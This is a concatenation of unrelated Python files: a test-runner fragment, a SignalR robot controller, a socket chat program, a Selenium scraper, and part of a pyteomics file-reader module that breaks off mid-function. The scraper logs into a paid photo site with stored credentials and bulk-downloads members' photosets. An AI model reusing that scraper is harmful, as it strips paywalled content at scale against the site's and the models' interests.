for t in _Tests:
Thread(target=t.run).start()
def run():
"""Run the test suite"""
print("Test Suite runner called")
thread = Thread(target=server.start) # Python threads
thread.start()
runTests()
def getTests():
return _Tests
class _Test():
WAITING = "Queued"
RUNNING = "Running"
SKIP = "Skipped"
PASS = "Passed"
FAIL = "Failed"
def __init__(self, function):
self.function = function
self.name = function.__name__
self.status = self.WAITING
self.elapsed = 0
def __repr__(self):
return f"{self.name} : {self.status} in {self.elapsed:.4f}"
def run(self):
self.status = self.RUNNING
start_time = time.perf_counter()
try:
self.function()
self.status = self.PASS
except AssertionError:
logging.error(
"There is an error in test:", exc_info=True)
self.status = self.FAIL
finally:
end_time = time.perf_counter()
self.elapsed = end_time-start_time
|
app2.py | import logging
import time
import json
from threading import Timer, Thread
from requests import Session
from signalr import Connection
import breezy_robot_handler
logging.basicConfig(level=logging.DEBUG)
RHANDLER = breezy_robot_handler.RobotHandler()
def signal_r_setup():
with Session() as session:
# create a connection
#connection = Connection("https://atbot01.azurewebsites.net/signalr", session)
connection = Connection("https://dube.azurewebsites.net/signalr", session)
#connection = Connection("http://localhost:6658/signalr", session)
# get control hub
bot = connection.register_hub('BotControl')
hub = connection.register_hub('WebRtcHub')
# start a connection
connection.start()
t = Timer(.1, RHANDLER.stop)
hub.server.invoke('registerBot', 'PyBot')
print('connected to SignalR hub... connection id: ' + connection.token)
# create new control message handler
def handle_bot_control_request(data):
print('received: ', data)
try:
command = data['Command']
#RHANDLER.get_sensors()
if command == "turn":
RHANDLER.turn(data)
elif command == "rise":
RHANDLER.rise(data)
else:
#RHANDLER.go(data)
RHANDLER.go_direct(data)
t.cancel()
t = Timer(0.50, RHANDLER.stop)
t.start()
except:
pass
def send_telemetry():
cnt = 0
while True:
cnt = cnt + 1
j = RHANDLER.get_sensors()
bot.server.invoke('sendBotTelemetry', j)
time.sleep(5)
# receive new chat messages from the hub
bot.client.on('controllerAt', handle_bot_control_request)
thread = Thread(target=send_telemetry, args=())
thread.daemon = True
thread.start()
# create error handler
def print_error(error):
print('error: ', error)
# process errors
connection.error += print_error
# wait before exit
connection.wait(None)
if __name__ == '__main__':
RHANDLER.init_bot()
signal_r_setup()
|
chat-app.py | import socket
import sys
import argparse
import threading
# set default values
address = "127.0.0.1"
port = 4444
username = "Me"
othername = "Received"
def recv_data_thread(socketObj):
while True:
try:
data=socketObj.recv(1024)
print(f"\n{othername}: {data.decode()}\n{username}: ", end="")
except ConnectionResetError:
if othername!="Received":
print(f"\nClosed by {othername}")
else:
print("\nClosed by other user.")
break
except ConnectionAbortedError:
print(f"\nConnection closed by {username.lower()}.")
break
socketObj.close()
print("Program Exited")
sys.exit()
def server_func(address, port, username):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((address, port))
s.listen()
print("\nServer address: " + address )
print("Server listening port: " + str(port))
print("\nWaiting for connection from client ...")
try :
conn, addr = s.accept()
except KeyboardInterrupt:
print("\nProgram exited.")
s.close()
sys.exit()
except :
print("\nError")
s.close()
sys.exit()
else:
print("\nConnected client IP: " + addr[0])
print("Connected client port: " + str(addr[1]))
print()
conn.send(bytes(username, encoding="UTF-8"))
global othername
othername = conn.recv(1024)
othername = othername.decode()
if othername=="Me":
othername="Received"
recv_ = threading.Thread(target=recv_data_thread, args=(conn,))
recv_.start()
while True:
try:
print(f"{username}: ", end="")
to_send = input()
conn.send(bytes(to_send, encoding="UTF-8"))
except KeyboardInterrupt:
print("\nProgam Exited.")
conn.close()
s.close()
sys.exit()
except:
conn.close()
s.close()
sys.exit()
finally:
conn.close()
except KeyboardInterrupt:
print("\nProgam Exited.")
sys.exit()
except:
sys.exit()
finally:
s.close()
def client_func(address, port, username):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((address, port))
print("\nConnected Server IP: " + address)
print("Connected Server port: " + str(port))
print()
global othername
othername = s.recv(1024)
othername = othername.decode()
if othername=="Me":
othername="Received"
s.send(bytes(username, encoding="UTF-8"))
recv_ = threading.Thread(target=recv_data_thread, args=(s,))
recv_.start()
while True:
try:
print(f"{username}: ",end="")
to_send=input()
s.send(bytes(to_send, encoding="UTF-8"))
except KeyboardInterrupt:
print("\nProgam Exited.")
s.close()
sys.exit()
except:
s.close()
sys.exit()
except KeyboardInterrupt:
print("\nProgam Exited.")
sys.exit()
except:
sys.exit()
finally:
s.close()
if __name__=="__main__":
parser = argparse.ArgumentParser(description="Simple Chat Program.")
parser.add_argument("--server", help="Create a server", action="store_true")
parser.add_argument("--client", help="Create a client", action="store_true")
parser.add_argument("-i", "--ipaddress", help="IP address (Default: 127.0.0.1)")
parser.add_argument("-p", "--port", help="Por number (Default: 4444)")
parser.add_argument("-u", "--username", help="The name used during connection")
args = parser.parse_args()
if args.ipaddress:
address=args.ipaddress
if args.port:
port=int(args.port)
if args.username:
username=args.username
if args.server:
server_func(address, port, username)
elif args.client:
client_func(address, port, username)
else :
print("Type python chat-app.py -h for usage information.")
print("Ctrl + C to exit the program.")
try :
input()
except KeyboardInterrupt:
sys.exit()
|
runner.py | import time, subprocess, os.path, re, multiprocessing, threading
from . import manifest
from enum import Enum, auto
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
class Runner:
@classmethod
def run(self, args, credentials):
urls = []
type = None
types = manifest.Manifest.types
time_period_translations = manifest.Manifest.time_period_translations
if args.type in [types[0], types[1]]:
type = "girl"
for name in args.names:
urls.append(name)
elif args.type in [types[2], types[3]]:
type = "hopeful"
for name in args.names:
urls.append(name)
elif args.type in [types[4], types[5]]:
type = "set"
for url in args.urls:
urls.append(url)
elif args.type in [types[6], types[7]]:
type = "girls"
urls = ["https://www.suicidegirls.com/photos/"]
elif args.type in [types[8], types[9]]:
type = "hopefuls"
urls = ["https://www.suicidegirls.com/photos/"]
elif args.type in [types[10], types[11], types[12]]:
type = "sotds"
urls = ["https://www.suicidegirls.com/photos/"]
elif args.type in [types[13], types[14]]:
type = "all"
urls = ["https://www.suicidegirls.com/photos/"]
un = credentials["username"]
pw = credentials["password"]
#
processed_args = (args.dir, args.processes, urls, type, time_period_translations[args.time_period], un, pw, args.interactive)
sg = SuicideGirls(processed_args[5], processed_args[6], processed_args[7], processed_args[0], processed_args[1], processed_args[2], processed_args[3], processed_args[4])
sg.startup()
start = time.time()
sg.rip()
sg.shutdown()
if(args.display_stats):
end = time.time()
duration = end - start
seconds = duration % 60
minutes = duration // 60
hours = minutes // 60
minutes = minutes % 60
print("Time taken (hh:mm:ss): " + str(int(hours)).zfill(2) + ":" + str(int(minutes)).zfill(2) + ":" + str(int(seconds)).zfill(2))
class MediaType(Enum):
IMAGE_ZIPS = auto()
SINGLE_VIDEO = auto()
VIDEO_CLIPS = auto()
class SuicideGirls:
driver = None
dispatcher_thread = None
argument_lists = []
stop_dispatching = False
def __init__(self, username, password, interactive, dir, process_limit, urls, type, time_period):
SuicideGirls.dispatcher_thread = threading.Thread(target=self.__dispatch)
self.root_url = "https://www.suicidegirls.com/"
self.username = username
self.password = password
self.exec_dir = "./"
self.girls_completed = 0
self.sets_completed = 0
if interactive:
self.build_interactive()
else:
self.dir = dir
self.process_limit = process_limit
self.__type = type
self.time_period = time_period
if type in ["girl", "hopeful"]:
self.urls = []
for url in urls:
self.urls.append(self.__build_url(url))
else:
self.urls = urls
SuicideGirls.dispatcher_thread.start()
def build_interactive(self):
print("Welcome to the Suicide Girls Plugin's interactive mode!")
print("You'll be asked a few questions before the plugin starts.")
print("(1/4) Where are we saving these photosets to?")
print("Default: " + os.path.abspath(os.path.dirname(self.exec_dir)))
self.dir = input("> ")
if self.dir is None or self.dir == "":
self.dir = os.path.abspath(os.path.dirname(self.exec_dir))
print("(2/4) How many ripping processes should be running?")
print("Default: 8")
self.process_limit = input("> ")
try:
self.process_limit = int(self.process_limit)
except ValueError:
self.process_limit = 8
choices = ["girl", "hopeful", "set", "all_girls", "all_hopefuls", "all_sets_of_the_day", "all"]
print("(3/4) What type of rip is this?")
print("Choices: " + ", ".join(choices))
print("Default: sets")
self.__type = input("> ")
if self.__type not in choices:
self.__type = "sets"
def __dispatch(self):
print("Beginning dispatcher thread...")
while not SuicideGirls.stop_dispatching or len(SuicideGirls.argument_lists) != 0:
if len(SuicideGirls.argument_lists) != 0:
print("Argument list found! Dispatching...")
argument_list = SuicideGirls.argument_lists.pop(0)
pool = multiprocessing.Pool(self.process_limit)
pool.map(self.download_image, argument_list)
print("Exiting dispatcher thread...")
def startup(self):
SuicideGirls.driver = webdriver.Chrome(executable_path="3rd-party-tools/chromedriver.exe")
SuicideGirls.driver.maximize_window()
SuicideGirls.driver.implicitly_wait(5)
SuicideGirls.driver.get(self.root_url)
self.__login()
def shutdown(self):
SuicideGirls.driver.quit()
def __login(self):
login_button_xpath = "//a[@class='login button' or @class='button login']"
login_form_submit_xpath = "//button[@type='submit' and text()='Login']"
username_box_xpath = "//input[@name='username']"
password_box_xpath = "//input[@name='password']"
SuicideGirls.driver.find_element_by_xpath(login_button_xpath).click()
SuicideGirls.driver.find_element_by_xpath(username_box_xpath).send_keys(self.username)
SuicideGirls.driver.find_element_by_xpath(password_box_xpath).send_keys(self.password)
SuicideGirls.driver.find_element_by_xpath(login_form_submit_xpath).click()
time.sleep(5)
flag = False
while True:
try:
image_select = SuicideGirls.driver.find_element_by_xpath("//iframe[@title='recaptcha challenge']")
if not flag:
print("Found a captcha!")
flag = True
except:
break
print("No captcha found!")
def rip(self):
for url in self.urls:
SuicideGirls.driver.get(url)
if self.__type == "girl":
print("Single girl")
self.__rip_girl()
elif self.__type == "girls":
print("All Suicide Girls")
self.__rip_all_girls()
elif self.__type == "hopefuls":
print("All hopefuls")
self.__rip_all_hopefuls()
elif self.__type == "sotds":
print("All sets of the day")
self.__rip_all_sets_of_the_day()
elif self.__type == "set":
print("Single set")
self.__rip_set()
elif self.__type == "all":
print("All!")
self.__rip_all_photos()
SuicideGirls.stop_dispatching = True
SuicideGirls.dispatcher_thread.join()
print("Rip completed.")
print("Total girls/hopefuls ripped: " + str(self.girls_completed))
print("Total sets ripped: " + str(self.sets_completed))
def __rip_all_photos(self):
SuicideGirls.driver.get(self.urls[0])
self.__type = "hopefuls"
self.__rip_all_hopefuls()
SuicideGirls.driver.get(self.urls[0])
self.__type = "girls"
self.__rip_all_girls()
SuicideGirls.driver.get(self.urls[0])
self.__type = "sotds"
self.__rip_all_sets_of_the_day()
def __rip_all_girls(self):
suicide_girls_xpath = "//li[@class='dropdown'][1]//ul/li/a[text() = 'SuicideGirls']"
self.__rip_all(suicide_girls_xpath)
def __rip_all_hopefuls(self):
hopefuls_xpath = "//li[@class='dropdown'][1]//ul/li/a[text() = 'Hopefuls']"
self.__rip_all(hopefuls_xpath)
def __rip_all_sets_of_the_day(self):
sotds_xpath = "//li[@class='dropdown'][1]//ul/li/a[text() = 'Sets Of The Day']"
self.__rip_all(sotds_xpath)
def __rip_all(self, type_xpath):
time_period_xpath = "//li[@class='dropdown'][3]//ul/li/a[text() = '" + self.time_period + "']"
girl_name_xpath = "//article/header//h2/a"
load_more_xpath = "//a[@id='load-more']"
choice = SuicideGirls.driver.find_element_by_xpath(type_xpath)
SuicideGirls.driver.get(choice.get_attribute("href"))
choice = SuicideGirls.driver.find_element_by_xpath(time_period_xpath)
SuicideGirls.driver.get(choice.get_attribute("href"))
girls = []
iteration = 0
while True:
iteration += 1
names = SuicideGirls.driver.find_elements_by_xpath(girl_name_xpath)
for name in names:
girls.append(name.text)
if iteration > 1:
SuicideGirls.driver.execute_script("for(i=0;i<24;i++) {e = document.evaluate(\"//article[1]\", document.documentElement); e = e.iterateNext(); if (e == null) {break;}e.parentNode.removeChild(e);}")
time.sleep(2)
lmb = SuicideGirls.driver.find_elements_by_xpath(load_more_xpath)
if len(lmb) > 0 and lmb[0].is_displayed():
lmb[0].click()
time.sleep(10)
else:
break
girls = list(set(girls))
for girl in sorted(girls):
url = self.__build_url(girl)
SuicideGirls.driver.get(url)
self.__rip_girl()
def __rip_girl(self):
load_more_xpath = "//a[@id='load-more']"
photos_xpath = "//div[@id='content-container']//a[text()='Photos']"
photosets_xpath = "//div[@id='content-container']//a[text()='Photosets']"
set_title_xpath = "//article/header//h2/a"
url = SuicideGirls.driver.find_element_by_xpath(photos_xpath).get_attribute("href")
SuicideGirls.driver.get(url)
url = SuicideGirls.driver.find_element_by_xpath(photosets_xpath).get_attribute("href")
SuicideGirls.driver.get(url)
set_links = []
iteration = 0
while True:
iteration += 1
titles = SuicideGirls.driver.find_elements_by_xpath(set_title_xpath)
for title in titles:
set_links.append(title.get_attribute("href"))
if iteration > 1:
SuicideGirls.driver.execute_script("for(i=0;i<9;i++) {e = document.evaluate(\"//article[1]\", document.documentElement); e = e.iterateNext(); if (e == null) {break;}e.parentNode.removeChild(e);}")
time.sleep(2)
lmb = SuicideGirls.driver.find_elements_by_xpath(load_more_xpath)
if len(lmb) > 0 and lmb[0].is_displayed():
lmb[0].click()
time.sleep(10)
else:
break
set_links = list(set(set_links))
for link in set_links:
SuicideGirls.driver.get(link)
self.__rip_set()
self.girls_completed += 1
def __rip_set(self):
girl_xpath = "//h1/a"
title_xpath = "//header[@class='header']/div[@class='top-bar']/h2[@class='title']"
full_image_button_xpath = "//a[@id='button-view_full_size']"
full_image_url_xpath = "//div[@data-image_url]"
girl = SuicideGirls.driver.find_element_by_xpath(girl_xpath).text
title = SuicideGirls.driver.find_element_by_xpath(title_xpath).text
dir_name = os.path.join("Suicide Girls", girl.title(), title.title())
dir_name = re.subn("[<>:\"/\|?*]", "", dir_name)[0]
dir_name = re.subn("\\.{3,}", "…", dir_name)[0]
dir_name = os.path.join(self.dir, dir_name)
check = False
if os.path.exists(dir_name):
check = True
SuicideGirls.driver.find_element_by_xpath(full_image_button_xpath).click()
time.sleep(5)
images = SuicideGirls.driver.find_elements_by_xpath(full_image_url_xpath)
image_urls = []
for i in range(0, len(images)):
url = images[i].get_attribute("data-image_url")
ext = url[url.rindex("."):]
file_name = "Suicide Girls - " + girl.title() + " - " + title.title() + " - Img" + str(i + 1).zfill(3) + ext
file_name = re.subn("[<>:\"/\|?*]", "", file_name)[0]
file_name = re.subn("\\.{3,}", "…", file_name)[0]
if not os.path.exists(os.path.join(dir_name, file_name)):
image_urls.append(url)
else:
print(girl.title() + "/" + title.title() + " Img" + str(i).zfill(3) + " already exists, skipping...")
self.__download_and_save_set(image_urls, girl, title)
self.sets_completed += 1
def __download_and_save_set(self, urls, girl, title):
aria_path = os.path.join(self.exec_dir, "3rd-party-tools", "aria2", "aria2c.exe")
error_strings = []
dir_name = os.path.join("Suicide Girls", girl.title(), title.title())
dir_name = re.subn("[<>:\"/\|?*]", "", dir_name)[0]
dir_name = re.subn("\\.{3,}", "…", dir_name)[0]
dir_name = os.path.join(self.dir, dir_name)
with multiprocessing.Pool(8) as pool:
args = []
for i in range (0, len(urls)):
command = [aria_path, "-d", dir_name, "-o"]
ext = urls[i][urls[i].rindex("."):]
file_name = "Suicide Girls - " + girl.title() + " - " + title.title() + " - Img" + str(i + 1).zfill(3) + ext
file_name = re.subn("[<>:\"/\|?*]", "", file_name)[0]
file_name = re.subn("\\.{3,}", "…", file_name)[0]
if os.path.exists(dir_name + file_name):
continue
command.append(file_name)
command.append(urls[i])
args.append((error_strings, command, str(i + 1), urls[i], girl, title))
SuicideGirls.argument_lists.append(args)
if len(error_strings) > 0:
f = open(os.path.join(dir_name, "errors.txt", "w"))
f.write("\n".join(sorted(error_strings)))
f.close()
def __build_url(self, name):
if self.__type in ["girl", "girls", "sotds"]:
return "https://www.suicidegirls.com/girls/" + name
elif self.__type in ["hopeful", "hopefuls"]:
return "https://www.suicidegirls.com/members/" + name
def download_image(self, args):
#print(args[1])
process = subprocess.run(args[1])
if process.returncode != 0:
args[0].append("\tImage " + args[2] + " failed; URL: " + args[3])
print(args[4].title() + "/" + args[5].title() + " #" + args[2] + " complete")
def print_warning():
print("This file is meant to be imported by other Python files, not run directly. Exiting now.")
if __name__ == "__main__":
print_warning()
|
file_helpers.py | import sys
import codecs
import re
from functools import wraps
from contextlib import contextmanager
from collections import OrderedDict, defaultdict
import json
import multiprocessing as mp
import threading
import warnings
import os
try:
basestring
except NameError:
basestring = (str, bytes)
try:
import pandas as pd
except ImportError:
pd = None
try:
import numpy as np
except ImportError:
np = None
try:
import dill
except ImportError:
dill = None
try:
import cPickle as pickle
except ImportError:
import pickle
serializer = pickle
else:
serializer = dill
try:
from queue import Empty
except ImportError:
from Queue import Empty
try:
from collections.abc import Sequence
except ImportError:
from collections import Sequence
from . import PyteomicsError
def _keepstate(func):
"""Decorator to help keep the position in open files passed as
positional arguments to functions"""
@wraps(func)
def wrapped(*args, **kwargs):
positions = [getattr(arg, 'seek', None) and getattr(arg, 'tell', type(None))() for arg in args]
for arg, pos in zip(args, positions):
if pos is not None:
arg.seek(0)
res = func(*args, **kwargs)
for arg, pos in zip(args, positions):
if pos is not None:
try:
arg.seek(pos)
except ValueError:
pass
return res
return wrapped
def _keepstate_method(func):
"""Decorator for :py:class:`FileReader` methods to help keep the position
in the underlying file.
"""
@wraps(func)
def wrapped(self, *args, **kwargs):
position = self.tell()
self.seek(0)
try:
return func(self, *args, **kwargs)
finally:
self.seek(position)
return wrapped
class _file_obj(object):
"""Check if `f` is a file name and open the file in `mode`.
A context manager."""
def __init__(self, f, mode, encoding=None):
self._file_spec = None
self.mode = mode
if f is None:
self.file = {'r': sys.stdin, 'a': sys.stdout, 'w': sys.stdout
}[mode[0]]
self._file_spec = None
elif isinstance(f, basestring):
self.file = codecs.open(f, mode, encoding)
self._file_spec = f
else:
self._file_spec = f
self.file = f
self.encoding = getattr(self.file, 'encoding', encoding)
self.close_file = (self.file is not f)
def __enter__(self):
return self
def __reduce_ex__(self, protocol):
return self.__class__, (self._file_spec, self.mode, self.encoding)
def __exit__(self, *args, **kwargs):
if (not self.close_file) or self._file_spec is None:
return # do nothing
# clean up
exit = getattr(self.file, '__exit__', None)
if exit is not None:
return exit(*args, **kwargs)
else:
exit = getattr(self.file, 'close', None)
if exit is not None:
exit()
def __getattr__(self, attr):
return getattr(self.file, attr)
def __iter__(self):
return iter(self.file)
class NoOpBaseReader(object):
def __init__(self, *args, **kwargs):
pass
class IteratorContextManager(NoOpBaseReader):
def __init__(self, *args, **kwargs):
self._func = kwargs.pop('parser_func')
self._args = args
self._kwargs = kwargs
if type(self) == IteratorContextManager:
self.reset()
super(IteratorContextManager, self).__init__(*args, **kwargs)
def __getstate__(self):
state = {}
state['_iterator_args'] = self._args
state['_iterator_kwargs'] = self._kwargs
return state
def __setstate__(self, state):
self._args = state['_iterator_args']
self._kwargs = state['_iterator_kwargs']
def reset(self):
"""Resets the iterator to its initial state."""
try:
self._reader = self._func(*self._args, **self._kwargs)
except Exception:
self.__exit__(*sys.exc_info())
raise
def __enter__(self):
return self
def __exit__(self, *args, **kwargs):
pass
def __iter__(self):
return self
def __next__(self):
# try:
return next(self._reader)
# except StopIteration:
# self.__exit__(None, None, None)
# raise
next = __next__
class FileReader(IteratorContextManager):
"""Abstract class implementing context manager protocol
for file readers.
"""
def __init__(self, source, **kwargs):
func = kwargs['parser_func']
super(FileReader, self).__init__(*kwargs['args'], parser_func=func, **kwargs['kwargs'])
self._pass_file = kwargs['pass_file']
self._source_init = source
self._mode = kwargs['mode']
self._encoding = kwargs.get('encoding')
self.reset()
def reset(self):
if hasattr(self, '_source'):
self._source.__exit__(None, None, None)
self._source = _file_obj(self._source_init, self._mode, self._encoding)
try:
if self._pass_file:
self._reader = self._func(
self._source, *self._args, **self._kwargs)
else:
self._reader = self._func(*self._args, **self._kwargs)
except Exception: # clean up on any error
self.__exit__(*sys.exc_info())
raise
def __exit__(self, *args, **kwargs):
self._source.__exit__(*args, **kwargs)
# delegate everything else to file object
def __getattr__(self, attr):
if attr == '_source':
raise AttributeError
return getattr(self._source, attr)
def remove_bom(bstr):
return bstr.replace(codecs.BOM_LE, b'').lstrip(b"\x00")
class IndexedReaderMixin(NoOpBaseReader):
"""Common interface for :py:class:`IndexedTextReader` and :py:class:`IndexedXML`."""
@property
def index(self):
return self._offset_index
@property
def default_index(self):
return self._offset_index
def __len__(self):
return len(self._offset_index)
def __contains__(self, key):
return key in self._offset_index
def _item_from_offsets(self, offsets):
raise NotImplementedError
def get_by_id(self, elem_id):
index = self.default_index
if index is None:
raise PyteomicsError('Access by ID requires building an offset index.')
offsets = index[elem_id]
return self._item_from_offsets(offsets)
def get_by_ids(self, ids):
return [self.get_by_id(key) for key in ids]
def get_by_index(self, i):
try:
key = self.default_index.from_index(i, False)
except AttributeError:
raise PyteomicsError('Positional access requires building an offset index.')
return self.get_by_id(key)
def get_by_indexes(self, indexes):
return [self.get_by_index(i) for i in indexes]
def get_by_index_slice(self, s):
try:
keys = self.default_index.from_slice(s, False)
except AttributeError:
raise PyteomicsError('Positional access requires building an offset index.')
return self.get_by_ids(keys)
def get_by_key_slice(self, s):
keys = self.default_index.between(s.start, s.stop)
if s.step:
keys = keys[::s.step]
return self.get_by_ids(keys)
def __getitem__(self, key):
if isinstance(key, basestring):
return self.get_by_id(key)
if isinstance(key, int):
return self.get_by_index(key)
if isinstance(key, Sequence):
if not key:
return []
if isinstance(key[0], int):
return self.get_by_indexes(key)
if isinstance(key[0], basestring):
return self.get_by_ids(key)
if isinstance(key, slice):
for item in (key.start, key.stop, key.step):
if item is not None:
break
if isinstance(item, int):
return self.get_by_index_slice(key)
if isinstance(item, basestring):
return self.get_by_key_slice(key)
if item is None:
return list(self)
raise PyteomicsError('Unsupported query key: {}'.format(key))
class RTLocator():
def __init__(self, reader):
self._reader = reader
def _get_scan_by_time(self, time):
"""Retrieve the scan object for the specified scan time.
Parameters
----------
time : float
The time to get the nearest scan from
Returns
-------
tuple: (scan_id, scan, scan_time)
"""
if not self._reader.default_index:
raise PyteomicsError("This method requires the index. Please pass `use_index=True` during initialization")
scan_ids = tuple(self._reader.default_index)
lo = 0
hi = len(scan_ids)
best_match = None
best_error = float('inf')
best_time = None
best_id = None
if time == float('inf'):
scan = self._reader.get_by_id(scan_ids[-1])
return scan_ids[-1], scan, self._reader._get_time(scan)
while hi != lo:
mid = (hi + lo) // 2
sid = scan_ids[mid]
scan = self._reader.get_by_id(sid)
scan_time = self._reader._get_time(scan)
err = abs(scan_time - time)
if err < best_error:
best_error = err
best_match = scan
best_time = scan_time
best_id = sid
if scan_time == time:
return sid, scan, scan_time
elif (hi - lo) == 1:
return best_id, best_match, best_time
elif scan_time > time:
hi = mid
else:
lo = mid
def __getitem__(self, key):
if isinstance(key, (int, float)):
return self._get_scan_by_time(key)[1]
if isinstance(key, Sequence):
return [self._get_scan_by_time(t)[1] for t in key]
if isinstance(key, slice):
if key.start is None:
start_index = self._reader.default_index.from_index(0)
else:
start_index = self._get_scan_by_time(key.start)[0]
if key.stop is None:
stop_index = self._reader.default_index.from_index(-1)
else:
stop_index = self._get_scan_by_time(key.stop)[0]
return self._reader[start_index:stop_index:key.step]
class TimeOrderedIndexedReaderMixin(IndexedReaderMixin):
@property
def time(self):
return self._time
def __init__(self, *args, **kwargs):
super(TimeOrderedIndexedReaderMixin, self).__init__(*args, **kwargs)
self._time = RTLocator(self)
@staticmethod
def _get_time(scan):
raise NotImplementedError
class IndexedTextReader(IndexedReaderMixin, FileReader):
"""Abstract class for text file readers that keep an index of records for random access.
This requires reading the file in binary mode."""
delimiter = None
label = None
block_size = 1000000
label_group = 1
def __init__(self, source, **kwargs):
# the underlying _file_obj gets None as encoding
# to avoid transparent decoding of StreamReader on read() calls
encoding = kwargs.pop('encoding', 'utf-8')
super(IndexedTextReader, self).__init__(source, mode='rb', encoding=None, **kwargs)
self.encoding = encoding
for attr in ['delimiter', 'label', 'block_size', 'label_group']:
if attr in kwargs:
setattr(self, attr, kwargs.pop(attr))
self._offset_index = None
if not kwargs.pop('_skip_index', False):
self._offset_index = self.build_byte_index()
def __getstate__(self):
state = super(IndexedTextReader, self).__getstate__()
state['offset_index'] = self._offset_index
return state
def __setstate__(self, state):
super(IndexedTextReader, self).__setstate__(state)
self._offset_index = state['offset_index']
def _chunk_iterator(self):
fh = self._source.file
delim = remove_bom(self.delimiter.encode(self.encoding))
buff = fh.read(self.block_size)
parts = buff.split(delim)
started_with_delim = buff.startswith(delim)
tail = parts[-1]
front = parts[:-1]
i = 0
for part in front:
i += 1
if part == b"":
continue
if i == 1:
if started_with_delim:
yield delim + part
else:
yield part
else:
yield delim + part
running = True
while running:
buff = fh.read(self.block_size)
if len(buff) == 0:
running = False
buff = tail
else:
buff = tail + buff
parts = buff.split(delim)
tail = parts[-1]
front = parts[:-1]
for part in front:
yield delim + part
yield delim + tail
def _generate_offsets(self):
i = 0
pattern = re.compile(remove_bom(self.label.encode(self.encoding)))
for chunk in self._chunk_iterator():
match = pattern.search(chunk)
if match:
label = match.group(self.label_group)
yield i, label.decode(self.encoding), match
i += len(chunk)
yield i, None, None
def build_byte_index(self):
index = OffsetIndex()
g = self._generate_offsets()
last_offset = 0
last_label = None
for offset, label, keyline in g:
if last_label is not None:
index[last_label] = (last_offset, offset)
last_label = label
last_offset = offset
assert last_label is None
return index
def _read_lines_from_offsets(self, start, end):
self._source.seek(start)
lines = self._source.read(end - start).decode(self.encoding).split('\n')
return lines
class IndexSavingMixin(NoOpBaseReader):
"""Common interface for :py:class:`IndexSavingXML` and :py:class:`IndexSavingTextReader`."""
_index_class = NotImplemented
@property
def _byte_offset_filename(self):
try:
path = self._source.name
except AttributeError:
return None
name, ext = os.path.splitext(path)
byte_offset_filename = '{}-{}-byte-offsets.json'.format(name, ext[1:])
return byte_offset_filename
def _check_has_byte_offset_file(self):
"""Check if the file at :attr:`_byte_offset_filename` exists
Returns
-------
bool
Whether the file exists
"""
path = self._byte_offset_filename
if path is None:
return False
return os.path.exists(path)
@classmethod
def prebuild_byte_offset_file(cls, path):
"""Construct a new XML reader, build its byte offset index and
write it to file
Parameters
----------
path : str
The path to the file to parse
"""
with cls(path) as inst:
inst.write_byte_offsets()
def write_byte_offsets(self):
"""Write the byte offsets in :attr:`_offset_index` to the file
at :attr:`_byte_offset_filename`
"""
with open(self._byte_offset_filename, 'w') as f:
self._offset_index.save(f)
@_keepstate_method
def _build_index(self):
"""Build the byte offset index by either reading these offsets
from the file at :attr:`_byte_offset_filename`, or falling back
to the method used by :class:`IndexedXML` if this operation fails
due to an IOError
"""
if not self._use_index: return
try:
self._read_byte_offsets()
except (IOError, AttributeError, TypeError):
super(IndexSavingMixin, self)._build_index()
def _read_byte_offsets(self):
"""Read the byte offset index JSON file at :attr:`_byte_offset_filename`
and populate :attr:`_offset_index`
"""
with open(self._byte_offset_filename, 'r') as f:
index = self._index_class.load(f)
self._offset_index = index
def _file_reader(_mode='r'):
# a lot of the code below is borrowed from
# http://stackoverflow.com/a/14095585/1258041
def decorator(_func):
"""A decorator implementing the context manager protocol for functions
that read files.
Note: 'close' must be in kwargs! Otherwise it won't be respected.
"""
@wraps(_func)
def helper(*args, **kwargs):
if args:
return FileReader(args[0], mode=_mode, parser_func=_func, pass_file=True, args=args[1:], kwargs=kwargs,
encoding=kwargs.pop('encoding', None))
source = kwargs.pop('source', None)
return FileReader(source, mode=_mode, parser_func=_func, pass_file=True, args=(), kwargs=kwargs, encoding=kwargs.pop('encoding', None))
return helper
return decorator
def _file_writer(_mode='a'):
def decorator(_func):
"""A decorator that opens output files for writer functions.
"""
@wraps(_func)
def helper(*args, **kwargs):
m = kwargs.pop('file_mode', _mode)
enc = kwargs.pop('encoding', None)
if len(args) > 1:
with _file_obj(args[1], m, encoding=enc) as out:
return _func(args[0], out, *args[2:], **kwargs)
else:
with _file_obj(kwargs.pop('output', None), m, encoding=enc) as out:
return _func(*args, output=out, **kwargs)
return helper
return decorator
class WritableIndex(object):
schema_version = (1, 0, 0)
_schema_version_tag_key = "@pyteomics_schema_version"
def _serializable_container(self):
container = {'index': list(self.items())}
return container
def save(self, fp):
container = self._serializable_container()
container[self._schema_version_tag_key] = self.schema_version
json.dump(container, fp)
@classmethod
def load(cls, fp):
container = json.load(fp, object_hook=OrderedDict)
version_tag = container.get(cls._schema_version_tag_key)
if version_tag is None:
# The legacy case, no special processing yet
inst = cls()
inst.schema_version = None
return inst
version_tag = tuple(version_tag)
index = container.get("index")
if version_tag < cls.schema_version:
# schema upgrade case, no special processing yet
inst = cls(index)
inst.schema_version = version_tag
return inst
# no need to upgrade
return cls(index)
class OffsetIndex(OrderedDict, WritableIndex):
'''An augmented OrderedDict that formally wraps getting items by index
'''
def __init__(self, *args, **kwargs):
super(OffsetIndex, self).__init__(*args, **kwargs)
self._index_sequence = None
def _invalidate(self):
self._index_sequence = None
@property
def index_sequence(self):
"""Keeps a cached copy of the :meth:`items` sequence
stored as a :class:`tuple` to avoid repeatedly copying
the sequence over many method calls.
Returns
-------
:class:`tuple`
"""
if self._index_sequence is None:
self._index_sequence = tuple(self.items())
return self._index_sequence
def __setitem__(self, key, value):
self._invalidate()
return super(OffsetIndex, self).__setitem__(key, value)
def pop(self, *args, **kwargs):
self._invalidate()
return super(OffsetIndex, self).pop(*args, **kwargs)
def find(self, key, *args, **kwargs):
return self[key]
def from_index(self, index, include_value=False):
'''Get an entry by its integer index in the ordered sequence
of this mapping.
Parameters
----------
index: int
The index to retrieve.
include_value: bool
Whether to return both the key and the value or just the key.
Defaults to :const:`False`.
Returns
-------
object:
If ``include_value`` is :const:`True`, a tuple of (key, value) at ``index``
else just the key at ``index``.
'''
items = self.index_sequence
if include_value:
return items[index]
else:
return items[index][0]
def from_slice(self, spec, include_value=False):
'''Get a slice along index in the ordered sequence
of this mapping.
Parameters
----------
spec: slice
